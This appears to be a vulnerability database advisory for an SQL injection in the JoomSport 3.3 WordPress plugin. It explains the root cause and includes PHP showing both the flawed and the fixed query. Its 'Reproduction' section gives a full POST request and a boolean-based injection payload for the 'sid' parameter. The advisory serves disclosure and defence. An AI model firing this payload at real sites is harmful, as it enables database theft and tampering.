VYPR
Unrated severity · NVD Advisory · Published Aug 5, 2019 · Updated Aug 5, 2024

CVE-2019-14348

Description

SQL injection in BearDev JoomSport plugin 3.3 for WordPress allows attackers to steal, modify, or delete database data via the sid parameter.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

The BearDev JoomSport plugin version 3.3 for WordPress contains a SQL injection vulnerability in the joomsport_season/new-yorkers/?action=playerlist endpoint. The sid parameter is not properly sanitized, allowing an attacker to inject arbitrary SQL queries. [1]

Exploitation

An unauthenticated attacker can exploit this by sending a crafted HTTP request to the vulnerable URL with a malicious sid parameter. The request does not require any prior authentication or user interaction. Public exploit code is available in the reference. [1]

Impact

Successful exploitation allows an attacker to steal, modify, or delete database information. This could result in a complete compromise of the WordPress site's data, including user credentials and sensitive content. [1]

Mitigation

No fix is disclosed in the available reference. Users should monitor for updates from the plugin vendor and consider disabling the plugin until a patch is applied. The plugin may have reached end-of-life status. [1]

References
  1. Packet Storm

AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 2

Patches: 0 (no patches discovered yet)

Vulnerability mechanics

Root cause

"The plugin fails to sanitize user-supplied input in the 'sid' parameter, allowing for SQL injection."

Attack vector

An attacker can exploit this vulnerability by sending a crafted POST request to the `joomsport_season/new-yorkers/?action=playerlist` endpoint. The request must include the `sid` parameter, which is vulnerable to SQL injection. By appending SQL code to the `sid` parameter, an attacker can manipulate database queries. The provided payload demonstrates a boolean-based blind SQL injection technique to confirm the vulnerability [1].

Affected code

The vulnerability exists in the BearDev JoomSport plugin version 3.3. Specifically, requests containing the 'sid' parameter are vulnerable. The exploit details name the endpoint `joomsport_season/new-yorkers/?action=playerlist` and the `sid` parameter within POST requests as the attack vector [1].

What the fix does

No patch is available in the provided documentation. The advisory indicates that the vulnerability is caused by improper handling of the 'sid' parameter. Remediation would typically involve validating and sanitizing or escaping the 'sid' parameter before it is used in database queries, so that user-supplied text can never be interpreted as SQL.
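To make that remediation concrete, the following is an added illustration (not code from the JoomSport plugin or BearDev) of the unsafe pattern the advisory describes, placed beside a hardened handler for the `action=playerlist` request. The function names, the table `joomsport_players` and the column `season_id` are assumptions; only the `sid` and `page` POST parameters come from the advisory.

```php
<?php
// Added illustration, not the JoomSport plugin's own code. The table and
// column names (joomsport_players, season_id) and function names are assumed.

// UNSAFE: the raw POST value is concatenated into the SQL text. A body such as
// "sid=-3506 OR 7339=7339" (the advisory's boolean-based check) turns the
// WHERE clause into a tautology, so the statement returns every row.
function joomsport_playerlist_unsafe() {
    global $wpdb;
    $sid  = isset( $_POST['sid'] ) ? $_POST['sid'] : '';
    $page = isset( $_POST['page'] ) ? $_POST['page'] : '1';
    $sql  = "SELECT * FROM {$wpdb->prefix}joomsport_players"
          . " WHERE season_id = " . $sid
          . " LIMIT 20 OFFSET " . ( ( $page - 1 ) * 20 );
    return $wpdb->get_results( $sql );
}

// HARDENED: accept only digit strings, coerce them with absint(), and bind
// them through $wpdb->prepare() so each value reaches MySQL as a literal.
// The same payload now fails validation before any query is built.
function joomsport_playerlist_safe() {
    global $wpdb;
    $raw_sid  = isset( $_POST['sid'] ) ? (string) $_POST['sid'] : '';
    $raw_page = isset( $_POST['page'] ) ? (string) $_POST['page'] : '1';

    if ( '' === $raw_sid || ! ctype_digit( $raw_sid ) ) {
        return new WP_Error( 'invalid_sid', 'sid must be a positive integer.' );
    }
    if ( ! ctype_digit( $raw_page ) ) {
        return new WP_Error( 'invalid_page', 'page must be a positive integer.' );
    }

    $sid    = absint( $raw_sid );
    $page   = max( 1, absint( $raw_page ) );
    $offset = ( $page - 1 ) * 20;

    // %d placeholders cast to integers; the values are never spliced as text.
    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}joomsport_players"
        . " WHERE season_id = %d LIMIT 20 OFFSET %d",
        $sid,
        $offset
    );
    return $wpdb->get_results( $sql );
}
```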

Preconditions

  • input: The 'sid' parameter in POST requests to the 'action=playerlist' endpoint.
  • config: The BearDev JoomSport plugin must be installed and active, specifically version 3.3.

Reproduction

POST /wordpress/joomsport_season/new-yorkers/?action=playerlist HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/joomsport_season/new-yorkers/?action=playerlist
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
DNT: 1
Connection: close
Cookie: PHPSESSID=s010flbg7fbohnguabsvjaut40
Upgrade-Insecure-Requests: 1

sid=1&page=1&jscurtab=

Payload: sid=-3506 OR 7339=7339&page=1&jscurtab=

Generated on Jun 4, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References: 3

News mentions: 0 (no linked articles in our index yet)